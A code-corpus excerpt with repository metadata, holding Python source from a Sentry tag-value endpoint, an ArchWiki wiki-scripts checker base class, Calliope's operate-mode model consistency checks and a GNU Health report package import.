if key in ('release', 'user', 'filename', 'function'):
lookup_key = 'sentry:{0}'.format(key)
else:
lookup_key = key
try:
tagkey = TagKey.objects.get(
project=project,
key=lookup_key,
status=TagKeyStatus.VISIBLE,
)
except TagKey.DoesNotExist:
raise ResourceDoesNotExist
queryset = TagValue.objects.filter(
project=project,
key=tagkey.key,
)
return self.paginate(
request=request,
queryset=queryset,
order_by='-id',
on_results=lambda x: serialize(x, request.user),
)
|
lahwaacz/wiki-scripts
|
ws/checkers/CheckerBase.py
|
Python
|
gpl-3.0
| 3,021
| 0.001655
|
#! /usr/bin/env python3
import contextlib
import threading
import mwparserfromhell
import ws.ArchWiki.lang as lang
from ws.utils import LazyProperty
from ws.parser_helpers.title import canonicalize
from ws.parser_helpers.wikicode import get_parent_wikicode, get_adjacent_node
__all__ = ["get_edit_summary_tracker", "localize_flag", "CheckerBase"]
# WARNING: using the context manager is not thread-safe
def get_edit_summary_tracker(wikicode, summary_parts):
@contextlib.contextmanager
def checker(summary):
text = str(wikicode)
try:
            yield
finally:
if text != str(wikicode):
summary_parts.append(summary)
return checker
def localize_flag(wikicode, node, template_name):
"""
If a ``node`` in ``wikicode`` is followed by a template with the same base
name as ``template_name``, this function changes the adjacent template's
name to ``template_name``.
:param wikicode: a :py:class:`mwparserfromhell.wikicode.Wikicode` object
:param node: a :py:class:`mwparserfromhell.nodes.Node` object
:param str template_name: the name of the template flag, potentially
including a language name
"""
parent = get_parent_wikicode(wikicode, node)
adjacent = get_adjacent_node(parent, node, ignore_whitespace=True)
if isinstance(adjacent, mwparserfromhell.nodes.Template):
adjname = lang.detect_language(str(adjacent.name))[0]
basename = lang.detect_language(template_name)[0]
if canonicalize(adjname) == canonicalize(basename):
adjacent.name = template_name
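def _demo_localize_flag():
    # Hedged sketch (not part of the original module, helper name is ours):
    # rename an adjacent flag template to a localized variant. The snippet and
    # the "Note (Česky)" template name are hypothetical ArchWiki-style
    # examples; the rename only happens if the adjacent-template detection
    # above succeeds.
    wikicode = mwparserfromhell.parse("[[Some link]] {{Note|text}}")
    link = wikicode.filter_wikilinks()[0]
    localize_flag(wikicode, link, "Note (Česky)")
    return str(wikicode)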
class CheckerBase:
def __init__(self, api, db, *, interactive=False, **kwargs):
self.api = api
self.db = db
self.interactive = interactive
# lock used for synchronizing access to the wikicode AST
# FIXME: the lock should not be an attribute of the checker, but of the wikicode
# maybe we can create a wrapper class (e.g. ThreadSafeWikicode) which would transparently synchronize all method calls: https://stackoverflow.com/a/17494777
# (we would still have to manually lock for wrapper functions and longer parts in the checkers)
self.lock_wikicode = threading.RLock()
@LazyProperty
def _alltemplates(self):
result = self.api.generator(generator="allpages", gapnamespace=10, gaplimit="max", gapfilterredir="nonredirects")
return {page["title"].split(":", maxsplit=1)[1] for page in result}
def get_localized_template(self, template, language="English"):
assert(canonicalize(template) in self._alltemplates)
localized = lang.format_title(template, language)
if canonicalize(localized) in self._alltemplates:
return localized
# fall back to English
return template
def handle_node(self, src_title, wikicode, node, summary_parts):
raise NotImplementedError("the handle_node method was not implemented in the derived class")
|
brynpickering/calliope
|
calliope/backend/checks.py
|
Python
|
apache-2.0
| 6,761
| 0.002219
|
"""
Copyright (C) 2013-2018 Calliope contributors listed in AUTHORS.
Licensed under the Apache 2.0 License (see LICENSE file).
run_checks.py
~~~~~~~~~~~~~
Checks for model consistency and possible errors when preparing run in the backend.
"""
import ruamel.yaml
import numpy as np
import pandas as pd
import xarray as xr
from calliope.core.attrdict import AttrDict
def check_operate_params(model_data):
"""
    If the model mode is `operate`, check for clashes in capacity constraints.
In this mode, all capacity constraints are set to parameters in the backend,
so can easily lead to model infeasibility if not checked.
Returns
-------
comments : AttrDict
debug output
warnings : list
possible problems that do not prevent the model run
from continuing
errors : list
serious issues that should raise a ModelError
"""
defaults = ruamel.yaml.load(model_data.attrs['defaults'], Loader=ruamel.yaml.Loader)
warnings, errors = [], []
comments = AttrDict()
def _get_param(loc_tech, var):
if _is_in(loc_tech, var) and not pd.isnull(model_data[var].loc[loc_tech].item()):
param = model_data[var].loc[loc_tech].item()
else:
param = defaults[var]
return param
def _is_in(loc_tech, set_or_var):
try:
model_data[set_or_var].loc[loc_tech]
return True
except (KeyError, AttributeError):
return False
for loc_tech in model_data.loc_techs.values:
energy_cap = model_data.energy_cap.loc[loc_tech].item()
# Must have energy_cap defined for all relevant techs in the model
if (pd.isnull(energy_cap) or np.isinf(energy_cap)) and not _is_in(loc_tech, 'force_resource'):
errors.append(
'Operate mode: User must define a finite energy_cap (via '
'energy_cap_equals or energy_cap_max) for {}'.format(loc_tech)
)
elif _is_in(loc_tech, 'loc_techs_finite_resource'):
# force resource overrides capacity constraints, so set capacity constraints to infinity
if _is_in(loc_tech, 'force_resource'):
if not _is_in(loc_tech, 'loc_techs_store'):
energy_cap = model_data.energy_cap.loc[loc_tech] = np.inf
warnings.append(
'Energy capacity constraint removed from {} as '
'force_resource is applied'.format(loc_tech)
)
if _is_in(loc_tech, 'resource_cap'):
print(loc_tech, model_data.resource_cap.loc_techs_supply_plus)
model_data.resource_cap.loc[loc_tech] = np.inf
warnings.append(
'Resource capacity constraint removed from {} as '
'force_resource is applied'.format(loc_tech)
)
# Cannot have infinite resource area (physically impossible)
if _is_in(loc_tech, 'loc_techs_area'):
area = model_data.resource_area.loc[loc_tech].item()
if pd.isnull(area) or np.isinf(area):
errors.append(
'Operate mode: User must define a finite resource_area '
'(via resource_area_equals or resource_area_max) for {}, '
'as a finite available resource is considered'.format(loc_tech)
)
# Cannot have consumed resource being higher than energy_cap, as
# constraints will clash. Doesn't affect supply_plus techs with a
# storage buffer prior to carrier production.
elif not _is_in(loc_tech, 'loc_techs_store'):
resource_scale = _get_param(loc_tech, 'resource_scale')
energy_cap_scale = _get_param(loc_tech, 'energy_cap_scale')
resource_eff = _get_param(loc_tech, 'resource_eff')
energy_eff = _get_param(loc_tech, 'energy_eff')
                resource = model_data.resource.loc[loc_tech].values
                if (energy_cap is not None and
any(resource * resource_scale * resource_eff >
energy_cap * energy_cap_scale * energy_eff)):
errors.append(
'Operate mode: resource is forced to be higher than '
'fixed energy cap for `{}`'.format(loc_tech)
)
if _is_in(loc_tech, 'loc_techs_store'):
if _is_in(loc_tech, 'charge_rate'):
storage_cap = model_data.storage_cap.loc[loc_tech].item()
if storage_cap and energy_cap:
charge_rate = model_data['charge_rate'].loc[loc_tech].item()
if storage_cap * charge_rate < energy_cap:
errors.append(
'fixed storage capacity * charge rate is not larger '
'than fixed energy capacity for loc::tech {}'.format(loc_tech)
)
# Must define a resource capacity to ensure the Pyomo param is created
# for it. But we just create an array of infs, so the capacity has no effect
if ('resource_cap' not in model_data.data_vars.keys() and
'loc_techs_supply_plus' in model_data.dims.keys()):
model_data['resource_cap'] = xr.DataArray(
[np.inf for i in model_data.loc_techs_supply_plus.values],
dims='loc_techs_supply_plus')
model_data['resource_cap'].attrs['is_result'] = 1
model_data['resource_cap'].attrs['operate_param'] = 1
warnings.append(
'Resource capacity constraint defined and set to infinity '
'for all supply_plus techs'
)
window = model_data.attrs.get('run.operation.window', None)
horizon = model_data.attrs.get('run.operation.horizon', None)
if not window or not horizon:
errors.append(
'Operational mode requires a timestep window and horizon to be '
'defined under run.operation'
)
elif horizon < window:
errors.append(
'Iteration horizon must be larger than iteration window, '
'for operational mode'
)
# Cyclic storage isn't really valid in operate mode, so we ignore it, using
# initial_storage instead (allowing us to pass storage between operation windows)
if model_data.attrs.get('run.cyclic_storage', True):
warnings.append(
'Storage cannot be cyclic in operate run mode, setting '
'`run.cyclic_storage` to False for this run'
)
model_data.attrs['run.cyclic_storage'] = False
return comments, warnings, errors
|
kret0s/gnuhealth-live
|
tryton/server/trytond-3.8.3/trytond/modules/health_history/report/__init__.py
|
Python
|
gpl-3.0
| 66
| 0.015152
|
# -*- coding: utf-8 -*-
from patient_evaluation_report import *
|